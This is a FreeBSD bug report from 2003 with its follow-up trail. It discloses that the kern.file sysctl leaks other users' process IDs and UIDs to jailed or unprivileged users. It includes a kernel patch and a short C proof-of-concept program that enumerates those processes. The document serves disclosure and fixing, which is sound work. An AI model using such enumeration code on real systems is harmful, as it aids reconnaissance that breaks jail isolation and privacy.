From nick@milla.ask33.net  Tue Jul  8 02:46:37 2003
Return-Path: <nick@milla.ask33.net>
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id 779DE37B404; Tue,  8 Jul 2003 02:46:37 -0700 (PDT)
Received: from milla.ask33.net (milla.ask33.net [217.197.166.60])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id A669F43FA3; Tue,  8 Jul 2003 02:46:36 -0700 (PDT)
	(envelope-from nick@milla.ask33.net)
Received: by milla.ask33.net (Postfix, from userid 1001)
	id E023E3ABB4D; Tue,  8 Jul 2003 11:51:29 +0200 (CEST)
Message-Id: <20030708095129.E023E3ABB4D@milla.ask33.net>
Date: Tue,  8 Jul 2003 11:51:29 +0200 (CEST)
From: Pawel Jakub Dawidek <nick@garage.freebsd.pl>
Reply-To: Pawel Jakub Dawidek <nick@garage.freebsd.pl>
To: FreeBSD-gnats-submit@freebsd.org
Cc: rwatson@freebsd.org
Subject: Seeing other uid with kern.file sysctl.
X-Send-Pr-Version: 3.113
X-GNATS-Notify:

>Number:         54211
>Category:       kern
>Synopsis:       Seeing other uid with kern.file sysctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    rwatson
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 08 02:50:16 PDT 2003
>Closed-Date:    Mon Aug 14 14:14:02 GMT 2006
>Last-Modified:  Mon Aug 14 14:14:02 GMT 2006
>Originator:     Pawel Jakub Dawidek
>Release:        FreeBSD 5.1-CURRENT i386
>Organization:
>Environment:
System: FreeBSD czort.hell.none 5.1-CURRENT FreeBSD 5.1-CURRENT #6: Mon Jul 7 18:59:08 CEST 2003 root@czort.hell.none:/usr/obj/usr/src/sys/CZORT i386
 

        
>Description:
	There is a way to get PIDs and UIDs of most of every processes running
	even if we are in jail or we are unprivileged user, but
	security.bsd.see_other_uids is set to 1. The only contition is that
	process have to have opened files. We could use for this sysctl
	kern.file that don't check if calling process could see other process.
	This bug doesn't seems to exist in FreeBSD 4.x, because credentials 
	and PID of process isn't exported to userland and in 5.x it is via
	xfile struct.

>How-To-Repeat:
	Here is a little program which shows how to use it.
	Should be run as follows:
	# gcc -Wall -o xfilehack xfilehack.c
	# jail / temp 127.0.0.1 `pwd`/xfilehack | uniq

        ---[ start of xfilehack.c ]---
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/file.h>
#include <libgen.h>
#include <string.h>
#include <errno.h>

int
main(int argc, char *argv[])
{
	struct xfile *files;
	const char *comm;
	size_t fsize = 0;
	int i;

	comm = basename(argv[0]);

	if (sysctlbyname("kern.file", NULL, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	files = malloc(fsize);
	if (files == NULL) {
		fprintf(stderr, "%s: %s\n", comm, strerror(ENOMEM));
		exit(EXIT_FAILURE);
	}
	if (sysctlbyname("kern.file", files, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	fsize /= sizeof(struct xfile);
	printf("PID	EUID\n");
	for (i = 0; i < (int)fsize; ++i)
		printf("%u	%u\n", files[i].xf_pid, files[i].xf_uid);

	exit(EXIT_SUCCESS);
}
        ---[ end of xfilehack.c ]---

>Fix:
        This patch fix the problem:

diff -ur /usr/src/sys/kern/kern_descrip.c src/sys/kern/kern_descrip.c
--- /usr/src/sys/kern/kern_descrip.c	Mon Jul  7 22:11:49 2003
+++ src/sys/kern/kern_descrip.c	Tue Jul  8 02:26:16 2003
@@ -2284,6 +2284,8 @@
 		n = 16;		/* A slight overestimate. */
 		sx_slock(&filelist_lock);
 		LIST_FOREACH(fp, &filehead, f_list) {
+			if (cr_cansee(req->td->td_ucred, fp->f_cred) != 0)
+				continue;
 			/*
 			 * We should grab the lock, but this is an
 			 * estimate, so does it really matter?
@@ -2301,6 +2303,10 @@
 	sx_slock(&allproc_lock);
 	LIST_FOREACH(p, &allproc, p_list) {
 		PROC_LOCK(p);
+		if (cr_cansee(req->td->td_ucred, p->p_ucred) != 0) {
+			PROC_UNLOCK(p);
+			continue;
+		}
 		xf.xf_pid = p->p_pid;
 		xf.xf_uid = p->p_ucred->cr_uid;
 		PROC_UNLOCK(p);
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->rwatson 
Responsible-Changed-By: rwatson 
Responsible-Changed-When: Fri Jul 25 12:51:47 PDT 2003 
Responsible-Changed-Why:  
Claim ownership of this PR since I sometimes have my fingers in 
the jail pot. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
State-Changed-From-To: open->suspended 
State-Changed-By: rwatson 
State-Changed-When: Mon Jul 28 09:02:51 PDT 2003 
State-Changed-Why:  
kern_descrip.c:1.210 commits a thread->proc visibility test to the 
information export part of kern.file.  For now, we'll leave an 
information leak in the calculation of #descriptors to size the 
user array for (similar to information leaked via kern.openfiles), 
and not do tests based on the nature of the descriptor, just the 
owner of the descriptor.  Placed in suspended since we'll want to 
revisit this as we clamp down on more aspects of file descriptor 
operation. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
State-Changed-From-To: suspended->closed 
State-Changed-By: rwatson 
State-Changed-When: Mon Aug 14 14:12:48 UTC 2006 
State-Changed-Why:  
Close this PR -- after adequate contemplation, the number of open file 
descriptors in the system is not something where the benefits outweigh 
the costs of protection. 


http://www.freebsd.org/cgi/query-pr.cgi?pr=54211 
>Unformatted:
